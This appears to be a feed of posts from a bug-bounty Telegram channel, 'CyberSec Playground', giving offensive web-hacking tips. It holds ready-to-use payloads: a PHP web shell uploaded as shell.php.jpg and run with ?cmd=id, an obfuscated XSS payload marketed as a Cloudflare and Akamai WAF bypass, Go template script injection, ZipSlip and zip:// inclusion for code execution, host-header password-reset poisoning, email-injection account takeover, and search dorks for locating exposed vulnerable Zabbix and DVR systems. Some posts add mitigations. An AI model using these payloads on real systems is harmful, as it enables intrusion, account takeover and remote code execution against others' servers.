CyberSec Playground | Learn ethical hacking ⚡️
744 subscribers
73 photos
1 video
2 files
188 links
Welcome to CyberSec Playground! A community to learn, explore, and master penetration testing and bug bounty, ethical hacking, and all things cybersecurity.
Backup : https://t.me/fatherofbits
cybersecplayground.com
#BugBounty #Hacking
Download Telegram
🔍 Tool Spotlight: WhatWeb – Website Fingerprinting Like a Pro

Want to know what’s running behind a website without touching the source code?
Meet WhatWeb — your go-to recon tool for fingerprinting technologies used on websites 🔧🌐

Read full Post At Github (Dont forget to give star and follow us on github) :

🔗 Link : https://github.com/cybersecplayground...

#bugbounty #CVE2024_24919 #checkpoint #vpn #infosec #cybersecurity #zeroday #cybersecplayground
5
💥 SSTI in Go Templates = Stored XSS?

If you come across SSTI (Server-Side Template Injection) in a Go (Golang) application, don’t stop at just proving injection — go for impact!



Try this payload to bypass HTML sanitization and achieve XSS :
{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}


🔍 This works because:

💎 Go templates treat {{define}} and {{template}} as dynamic blocks.
⚡️ You can inject arbitrary template logic including script tags.
🔸 Useful in misconfigured custom template rendering engines.

💡 Why it matters:
Stored XSS via SSTI can lead to session hijacking, data exfiltration, or even account takeover.

📢 Stay ahead in bug bounty & infosec — follow @cybersecplayground for daily tips, tools, and CVE insights.

💬 Found a new payload? Drop it in the comments!
👍 Like & 🔁 Share if this helped!

#bugbountytips #ssti #xss #golang #infosec #cybersec #cybersecplayground
🔥6💊2
🚨 CVE-2025-32756: Fortinet RCE via Stack-Based Buffer Overflow
A critical unauthenticated remote code execution vulnerability was discovered in multiple Fortinet products — caused by a stack-based buffer overflow in the AuthHash cookie parsing logic. Exploiting this allows full remote code execution without authentication.


🔍 Key Details:
📌 Type: Stack-based Buffer Overflow
💥 Impact: Unauthenticated RCE
🧠 Attack Vector: Malicious AuthHash cookie
📆 Year: 2025
🛠 Status: Public PoC available

🧪 Affected Products:
• FortiVoice
• FortiMail
• FortiNDR
• FortiRecorder
• FortiCamera

🧬 PoC GitHub Repo:
🔗 CVE-2025-32756-POC by kn0x0x

🛡 Mitigation Steps:
Apply patches released by Fortinet ASAP
Disable unnecessary web interfaces
Monitor for abnormal traffic targeting Fortinet login panels

📲 For more CVEs, PoCs, and recon tips — follow @cybersecplayground
Get smarter every day in cybersecurity.

🔁 Like & Share to spread awareness
#bugbounty #fortinet #rce #CVE2025_32756 #cybersecurity #infosec #zeroday #cybersecplayground
💊54🗿1
🚨 New WAF Bypass for Akamai & Cloudflare
🛡 XSS Payload via onscrollsnapchange + Obfuscation

Researchers found a new way to bypass some WAF rules using the obscure event onscrollsnapchange in combination with obfuscated eval logic.


💥 Payload:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])]
(window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ=='));
style=overflow-y:hidden;scroll-snap-type:x>
<div style=scroll-snap-align:center>1337</div></address>


🔍 How it works:
🔸onscrollsnapchange is rarely filtered and gets overlooked by many WAFs.
🔸 eval is split and reconstructed dynamically: ['l','b','c'][0] = 'l'.
🔸 Base64 payload decoded to: alert(origin).
🔸 Built-in scroll and display tricks help it render without suspicion.

Bypasses tested on:

Cloudflare (standard settings)
Akamai WAF profiles

💡 Tip: Always explore lesser-known event attributes + JS obfuscation when testing for XSS/WAF bypasses.

🔔 Follow @cybersecplayground for more cutting-edge bypasses, CVE drops, and recon techniques.

🔗 Other XSS payload list at cybersecplayground github
#xss #wafbypass #akamai #cloudflare #bugbountytips #cybersec #infosec #cybersecplayground
3🌭2💊1
💡 Bug Bounty Pro Tip: Uncover Hidden Subdomains via /cdn-cgi/trace 🔍

Want to find internal IPs or misconfigured edge services on live domains?

Try this:
➡️ Visit:

https://target.com/cdn-cgi/trace


It often reveals:
🔸 Internal IP (ip=)
🔸 Datacenter info
🔸 Trace metadata

🔁 From IP to Hidden Subdomains:

🎯 Get ASN range of the internal IP (using asnmap or amass intel)

🚀 Scan with naabu to find active hosts

🔎 Enumerate reverse DNS via dnsx to spot hidden subdomains!

💥 Sometimes you’ll catch staging, dev, or admin panels that don’t even show up in public recon.

🔐 Your move:
What’s YOUR secret trick for hidden subdomain hunting?
👇 Drop it below and share the love 👇

📡 Follow @cybersecplayground for daily recon tactics, advanced bug bounty tricks, and offensive security content.

#bugbounty #recon #infosec #subdomain #OSINT #CTF #cybersecplayground
7💊4
🚨 ALERT: CVE-2024-3721
Under Active Exploitation

A new variant of the Mirai malware botnet is exploiting a command injection vulnerability in TBK DVR-4104 and DVR-4216 digital video recording devices to hijack them.

The flaw, tracked under CVE-2024-3721, is a command injection vulnerability disclosed by security researcher "netsecfish" in April 2024. 🧠📟

🎯 Vulnerability: CVE-2024-3721
💥 Impact: Remote Code Execution → Botnet Infection
🔎 Targeted Devices: TBK DVR systems
📊 Over 97,000+ exposed services are indexed on Hunter

🧪 Recon Queries:

🔍 Hunter:
protocol.banner="Location:/login.rsp"


🔍 FOFA:
banner="Location:/login.rsp"


📚 In-Depth Analysis:
Kaspersky SecureList
BleepingComputer Report
SecurityOnline News

🧵 Hunter Direct Search:
🔗 Search Results (97K+)

💻 Stay ahead in vuln intelligence & recon: Join @cybersecplayground
🔁 Like & Share to spread awareness!

#CVE2024_3721 #Mirai #botnet #hunterhow #fofa #vulnerability #infosec #osint #cybersecplayground
7
🔍 Automating CORS Vulnerabilities with Corsy 🔥

CORS misconfigurations can expose sensitive data—and Corsy makes it EASY to automate the hunt! 😎

🧪 Steps to Automate:

🔍 Discover subdomains using tools like Amass or Subfinder

⚙️ Run the list with Corsy:

python3 corsy.py -i ./targets.txt

👀 Review endpoints leaking sensitive data (especially authenticated ones)

📄 Craft PoCs and escalate your findings

🛠 Corsy Features:
Lightweight Python3 tool
Scans all known CORS misconfigurations
Supports threading, delay, JSON output
Bypass detection: wildcard, null origin, pre/post domain, etc.

📦 Install:
git clone https://github.com/s0md3v/Corsy
cd Corsy && pip3 install requests


🚀 Example Usage:

python3 corsy.py -u https://example.com -t 20 --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked"

🔗 GitHub: Corsy by @s0md3v

🔐 Pro tip: Look for CORS on subdomains + login APIs leaking JSON user profiles 👀

📡 Stay sharp and hunt smart — automation = more bugs, faster 💸

Follow for more at 👉 @cybersecplayground
Like + Share if this saved you hours!
#bugbounty #cors #infosec #automation #cybersec #recon
4🔥4💊1
🚫 Stuck on a 403 Forbidden?
Don't give up yet — here are 7 powerful tricks to bypass it like a pro 💥

🔍 403 Bypass Techniques:

1️⃣ X-Forwarded-For: 127.0.0.1
2️⃣ X-Original-URL: /admin
3️⃣ Referer: https://target.com/
4️⃣ HTTP Method Manipulation: POST, HEAD, OPTIONS, DELETE
5️⃣ Case Sensitivity: /admin, /aDmIn, /Admin/
6️⃣ Encoding: URL encode parts (%2e, %2f, %20, etc.)
7️⃣ Path Normalization:
  • /../admin
  • //admin
  • /./admin

🧠 Bonus Tip: Always combine methods — e.g., custom headers + encoding = 🔓

💻 Daily hacks, PoCs, and recon tools — only at @cybersecplayground
👍 Like & Share if this saved your time!

#bugbounty #infosec #403bypass #cybersec #pentesting #websecurity #cybersecplayground
🔥81
🧠 Host Header Injection → Password Reset Poisoning

A simple yet powerful chain that leads to account takeover! 🔓

🚨 Attack Flow:
1️⃣ Web app builds the password reset link based on the Host header
2️⃣ Attacker crafts request:

POST /reset HTTP/1.1  
Host: attacker[.]com

...
3️⃣ App includes attacker domain in reset link
4️⃣ Victim clicks reset → Token goes to attacker[.]com
5️⃣ 🎯 Attacker captures token → Resets password → Account takeover 💀

💡 Mitigation:
Always validate Host header against a whitelist
Use absolute URLs server-side, not header-based
Consider X-Forwarded-Host + proxy settings

🔎 Tip: Use Burp or curl to manipulate headers and test for vulnerable reset flows!

📲 Follow @cybersecplayground for more attack techniques, PoCs, and bypass tips
👍 Like + 🔁 Share if you learned something new!
#bugbounty #websecurity #hostheader #infosec #cybersec #recon
5👍3
🚨 Next.js + WAF Bypass + SXSS via Cookie Reordering 🚨

🧠 Attack Summary:
You’re dealing with:

🔍 A Next.js app

⚠️ Two reflected cookies in pageProps
⚠️ A WAF blocking your initial attempts

🧪 Observations:
🧨 Single payload → 403 Forbidden

🧨 Split payload across two cookies → Still 403

🧨 Reorder the cookie fragments → 200 OK

👀 That’s your in! Reversing the order bypasses the WAF inspection logic 🔄

⚠️ Now chain it with:

🧫 CVE-2024-46982 (Elixir Stale SSR template injection)
🔗 https://github.com/masch1/CVE-2024-46982

➡️ This allows CP (Client-side Prototype Pollution) → Stored XSS (SXSS) in Next.js apps.

💣 Exploit Flow:
💎 Bypass WAF via cookie reordering
💎 Inject CP payload using stale Elixir template vuln
💎 Achieve SXSS across all visiting users!

🛡 Mitigation Tips:
Sanitize cookie inputs server-side
Audit template engines for unsafe parsing
Patch Elixir if in stack (see CVE-2024-46982)

🔍 Keep hunting clever chains like this. WAFs aren’t invincible!
📢 Follow @cybersecplayground for more wild bug chains, PoCs, and bypass tricks
👍 Like & 🔁 Share to help others learn!

#bugbounty #nextjs #xss #sxss #wafbypass #infosec #cybersecurity #cve2024_46982
🔥8
🚨 Bug Bounty Trick: Bypass Invalid ID Validation via Array Injection 🧠

Sometimes a small change makes a big difference!

🔍 Original Request:
DELETE /api/bookings?bookings=3777104

Response: 400 Bad Request — "Invalid Bookings"

Modified Request:
DELETE /api/bookings?bookings[]=3777104

💥 Response: 200 OK — Booking successfully deleted!

📌 Why This Works:
Some backends treat bookings= as a scalar (single ID), while bookings[]= is interpreted as an array of IDs.

If the API logic expects an array, this simple tweak can bypass input validation or authorization checks, potentially leading to:

🛑 IDOR (Insecure Direct Object Reference)
🗑 Unauthorized Deletion of Bookings
📬 Mass Resource Tampering (loop over IDs)

🔧 Tip: Always test both forms:
param=value
param[]=value

…and watch how the backend responds differently 🔎

📢 Stay sharp, test weird inputs, and keep hacking smart.
Follow @cybersecplayground for more tips like this.
👍 Like & 🔁 Share to help the community grow!

#bugbounty #api #idor #infosec #cybersec #websecurity #bypass #cybersecplayground
6👍4
🕵️‍♂️ Laravel Debug Leak via Negative ID Trick
🔍 Framework: PHP Laravel

If you come across a Laravel-based endpoint like:


GET /api/users/?userid=1234

👉 Try This:

GET /api/users/?userid=-1

💥 Why it works:
Passing a negative userid can trigger unhandled conditions or unexpected model lookups. In Laravel, this might expose:

🐞 Debug info
🔐 API keys or .env configs
🔁 Internal routes & proxies
📜 Stack traces and SQL queries

🧠 Pro Tip: Use this as a gadget — it's especially useful in chained attacks (e.g., IDOR + Debug Info = Pwnage).

📢 Follow @cybersecplayground for daily 🔍 recon tricks, bug bounty tips, and real PoCs.

#bugbountytips #laravel #debug #infosec #cybersec #websecurity #cybersecplayground
5🔥5
🌍 Find All Public VDPs with a Simple Dork 💥
Hunt responsible disclosure programs worldwide in seconds

🕵️ Dork for Shodan/ZoomEye:
(body="/responsible-disclosure"  body="/.well-known/security.txt") && port="443"


🔎 This will reveal sites with:

A Responsible Disclosure page Or a security.txt file (per RFC 9116)

💡 What You Get:
List of companies actively accepting vulnerability reports
Perfect targets for legal bug bounty hunting
Entry points into private bounty programs
Contact emails for reporting bugs (security@example.com)

🧠 Why This Works:
🔸 /.well-known/security.txt is a standardized VDP endpoint
🔸 /responsible-disclosure is commonly used by companies not following RFC
🔸 Both indicate the company welcomes security testing (within scope)

🛠 Pro Tip:
Use these tools for discovery:
`
⚡️ ZoomEye
zoomeye search '(body="/responsible-disclosure" body="/.well-known/security.txt") && port="443"'

⚡️ Shodan CLI
shodan search '(http.html:"/responsible-disclosure" OR http.html:"/.well-known/security.txt") port:443'

Then scan those domains with your favorite recon & fuzzing tools 👇
🔥 They’re often low-hanging fruit with weak auth, forgotten endpoints, and juicy info.

📢 Reminder:
Always read the VDP scope before testing. No scope = no hacking.

🔔 Follow @cybersecplayground for daily recon tips and bug bounty gems
❤️ Like, 🔁 Share, and Tag your hacker friends!

#BugBounty #VDP #SecurityTXT #Recon #InfoSec #EthicalHacking #CTF #cybersecplayground #HackingTips
5👍1
🧠 Path Traversal in ZIP Uploads
A classic vulnerability that still pops up in the wild — let’s break it down:

📂 The Scenario:

1️⃣ The application accepts ZIP file uploads from users.
2️⃣ It extracts ZIP contents server-side without path sanitization.
3️⃣ The ZIP contains malicious paths like:

../../../../etc/passwd


4️⃣ No checks? Then boom 💥 — the files get extracted outside the intended directory.


🎯 Impact:
• Arbitrary file write on the server
• Potential to overwrite configs, upload web shells, or tamper with logs
• Leads to RCE, LFI, or privilege escalation depending on the context


🔐 How to Prevent:

Normalize & sanitize extraction paths
Use extraction libraries that block traversal (e.g., Python’s zipfile with validation)
Restrict ZIP extraction to a sandboxed directory only

📦 Payload Sample:

evil.zip
└── ../../../../var/www/html/shell.php


💻 Learning real exploitation techniques like this?
Stay sharp with daily tips at 👉 @cybersecplayground

#PathTraversal #ZipSlip #BugBounty #CyberSecurity #EthicalHacking #PentestTips #InfoSec #WebSecurity #Payloads #RCE #HackerTricks #ZipUpload #SecurityAwareness #CybersecPlayground
7👍1
🔓 Account Takeover via Email Injection Tricks

Sometimes, you don’t need a vulnerability — just a weak parser. Here’s a sneaky way to hijack accounts by injecting multiple emails in signup/login flows where email validation is broken. 🚨

🎯 The Idea:

The app checks only the first email, but sends confirmation/reset links to all of them.
If you sneak your email in, you get the link too.

🔍 Common Bypass Payloads (Separators):

email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com


📦 Array-Based Payload:

{
"email": ["victim@mail.com", "hacker@mail.com"]
}


If the server sends an email to both, you win 🏆

🧠 Why This Works:

Some backend libraries (especially in PHP or Node.js) parse input loosely, accepting multiple values — and sometimes broadcasting emails to all listed addresses. 😱


Always test registration, password reset, and invite systems
Monitor HTTP requests & responses
Use Burp, Param Miner, and manual tampering


💻 Stay ahead of the game — learn real ATO techniques & bug bounty tricks
Join us: 👉 @cybersecplayground


#AccountTakeover #BugBountyTips #EmailInjection #InfoSec #CyberSecurity #EthicalHacking #ATO #WebSecurity #Recon #HackingTricks #BugBounty #CybersecPlayground #infosec #bugbountytips #cybersec
8🔥1
🔍 #BugBountyTip — WP JSON Endpoint Scanner 🐘
🎯 Targeting WordPress? Here’s a quick win.

Many WordPress plugins (especially payment gateways or custom-built ones) expose REST endpoints under /wp-json/. These can leak:

PII
Order status & details
Webhook tokens
SQLi or XSS vectors
...all without authentication! 😱

💥 Pro Tip:
Scan all /wp-json/** endpoints and test them for:

🐞 SQLi
🎯 Blind XSS
🔓 Auth bypass
🧾 Data leaks (orders, user info)

🛠 Script to automate discovery
A neat Python script to extract all exposed endpoints:

📎 Script:
🔗 wp_json.py

🖥 Usage:
python3 wp_json.py https:http://example.com/wp-json/


⚡️Load those endpoints into Burp Intruder, ffuf, or test manually.
Focus on insecure params and unauth access!

🧠 TL;DR:
Don’t skip /wp-json/ in your recon — it’s a goldmine, especially with misconfigured or in-house plugins. 😉

🔔 Stay sharp, stay curious.

Follow @cybersecplayground for more scripts, recon gems & real-world exploits.
❤️ Like & 🔁 Share if this tip helped!

#bugbountytips #WordPress #WPScan #recon #infosec #pentesting #cybersec #cybersecplayground
🗿5👍41
🧠 Unsafe File Upload → MIME Type Bypass
📂 From innocent upload… to full Remote Code Execution 💥

🚨 Attack Flow:
1️⃣ App only checks Content-Type header or file extension (😬 rookie mistake)
2️⃣ Attacker uploads shell.php.jpg — looks like an image, but hides PHP code inside
3️⃣ Server accepts it as valid (no deep validation)
4️⃣ If stored in a web-accessible path... boom 💣 — you hit it via browser, and PHP executes 🧠

🛠 Payload Example:
<?php system($_GET["cmd"]); ?>


Upload as:
shell.php.jpg


And access:
https://target.com/uploads/shell.php.jpg?cmd=id


If Apache/Nginx interprets .php before .jpg, you’ve just triggered code execution

🔐 Hardening Tips:
• Use content inspection (MIME sniffing) on file contents, not just headers
• Rename uploaded files and remove extensions
• Disable execution in upload directories (.htaccess, Nginx config)

💡 Even in 2025, unsafe file upload logic is everywhere.
Use it to escalate from low severity bug to critical impact.


🚀 Follow @cybersecplayground for hands-on exploits, recon tricks, and advanced web hacking tutorials.
⚡️All tips & tricks are availabe at our github
💬 Like + 🔁 Share if you’ve ever dropped a shell via image upload!

#bugbounty #cybersecplayground #fileupload #infosec #rce #websecurity #pentesting
🆒5👍1
👀 guys what about a WEEK full of file upload tricks and tips?Drop your comments
👍6
🚨 Alert: CVE-2024-22120 – Zabbix SQLi → RCE Attack Chain
CVSS Score: 9.1 (Critical)

Affects: 🖥 Popular monitoring system Zabbix

🔥 PoC & Exploits:
🧪 Official Bug Tracker: ZBX-24505
💥 Exploit Script: GitHub – CVE-2024-22120-RCE

⚠️ What’s the Risk?
This is a time-based SQL injection vulnerability that could:
• Leak sensitive DB info
• Escalate privileges
• Lead to full Remote Code Execution (RCE) on Zabbix servers

🛰 Track Vulnerable Targets:

Hunter is currently under maintenance 🛠, so use these dorks instead:

🔎 FOFA:
app="ZABBIX-Monitoring"


🔎 Shodan:
http.component:"Zabbix"


🔎 Hunter (when online):
product.name="Zabbix"


📰 More Details:
SecurityOnline Advisory

🎯 Impact:
Zabbix is widely used in enterprises for infrastructure monitoring. An RCE here = access to entire internal networks, critical alerts, server health, and more.

📢 Patch or mitigate immediately!

Follow @cybersecplayground for daily vulnerability alerts, PoCs, recon tips & red team tactics.
💬 Like + 🔁 Share to warn your team or community!

#Zabbix #RCE #CVE2024 #infosec #bugbounty #cybersecplayground #vulnerability #sqlinjection #redteam
🔥7
CyberSec Playground | Learn ethical hacking ⚡️
👀 guys what about a WEEK full of file upload tricks and tips?Drop your comments
📂 Beginner's Guide (Part 1 of file upload week) : File Upload Vulnerability
💣 "It’s just a profile picture… or is it?"

🔍 What is a File Upload Vulnerability?

Some websites let users upload files — like images, documents, or PDFs. But if the website doesn’t check the uploaded file properly, an attacker might upload a dangerous file — like a script — that gets executed on the server!

This can lead to:

❗️ Website defacement
🐚 Remote Code Execution (RCE)
🔓 Server access or full control

🧪 Real Example:
A user uploads cat.jpg, but the attacker uploads:
cat.php.jpg or rce.php

If the server:

Accepts the file
Saves it to a public folder
Doesn’t validate it properly

Then the attacker can access http://target.com/uploads/rce.php
And run commands directly on the website!

⚠️ Why Does This Happen?

🔸 Server trusts the file extension (.jpg, .pdf, etc.)
🔸 Server doesn’t check content inside the file
🔸 Upload folder has execution permissions

🛡 How to Stay Safe (for Developers):

Only allow specific file types
Rename uploaded files on the server
Store them in folders without execution rights
Scan uploaded files for malicious content
Use proper libraries for file handling

🎯 Why Should Bug Hunters Care?
This is a very common issue in older CMS, custom admin panels, and web apps. If you find a file upload function — test it! It might be your way to RCE 😈

📚 Stay sharp. Learn vulnerabilities. Hack smart.
🔐 Follow @cybersecplayground for more beginner-to-advanced security tips!

#cybersecurity #bugbounty #fileupload #beginner #infosec #websecurity #webapp #cybersecplayground
💊8🔥3
CyberSec Playground | Learn ethical hacking ⚡️
📂 Beginner's Guide (Part 1 of file upload week) : File Upload Vulnerability 💣 "It’s just a profile picture… or is it?" 🔍 What is a File Upload Vulnerability? Some websites let users upload files — like images, documents, or PDFs. But if the website doesn’t…
🚩 📂 Beginner's Guide (Part 2 of file upload week) :
Exploiting ZIP Uploads for RCE

If a web app lets you upload .zip files… this trick might just get you RCE 😈

🔧 Step-by-step:

1️⃣ Create a PHP payload (e.g. rce.php)
2️⃣ Compress it: zip file.zip
3️⃣ Upload file.zip to the vulnerable web app
4️⃣ Trigger the payload like this:

https://<target>.com/index.php?page=zip://path/file.zip#rce.php

💥 If the server supports dynamic inclusion of ZIP content, your PHP gets executed = Remote Code Execution

🧠 Works on systems with poorly configured ZIP handlers (like some outdated CMS or custom file viewers)

Pro Tip: Always inspect how the app handles uploaded files. If it includes content dynamically using user input — you're in the game.

💣 Happy Hunting!

🔐 Follow @cybersecplayground for more real-world exploit tips & bug bounty gems.

#bugbounty #zipupload #rce #websecurity #infosec #cybersecplayground #exploittips #pentesting
🔥8💊3